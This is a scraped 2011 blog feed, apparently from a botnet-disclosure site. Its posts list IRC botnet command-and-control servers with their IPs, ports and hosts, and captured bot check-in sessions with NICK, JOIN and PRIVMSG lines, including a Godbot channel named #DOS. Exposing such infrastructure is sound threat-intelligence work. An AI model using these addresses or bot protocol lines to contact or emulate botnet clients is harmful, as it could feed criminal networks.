/>http://whois.domaintools.com/190.254.18.77<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4038844702909319978?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-90607174586763501732011-11-15T17:51:00.002+01:002011-11-15T17:51:45.557+01:0089.248.164.76(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)Remote Host Port Number<br />199.15.234.7 80<br />89.248.164.76 6667<br /><br />NICK New{US-XP-x86}3726848<br />USER 3726848 "" "3726848" :3726848<br />MODE New{US-XP-x86}3726848 +iMm<br />JOIN #cyber<br />PONG 422<br /><br />hosting infos:<br />http://whois.domaintools.com/89.248.164.76<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-9060717458676350173?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-88010052314346195452011-11-14T23:10:00.000+01:002011-11-14T23:10:17.778+01:0064.34.200.181(irc botnet hosted in United States Newhall Serverbeach)Remote Host Port Number<br />64.34.200.181 2345<br /><br />NICK New[USA|00|P|73781]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-9402 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|73781] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/64.34.200.181<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8801005231434619545?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-21631847669791669902011-11-14T19:27:00.002+01:002011-11-14T19:27:41.499+01:0078.46.158.211(Godbot hosted in Germany Hetzner Online Ag)Remote Host Port Number<br />78.46.158.211 901<br /><br />NICK Godbot|USA|XP|1011011<br />USER wonwgrzv "" "lol" :wonwgrzv<br />JOIN #DOS<br /><br />hosting infos:<br />http://whois.domaintools.com/78.46.158.211<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2163184766979166990?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0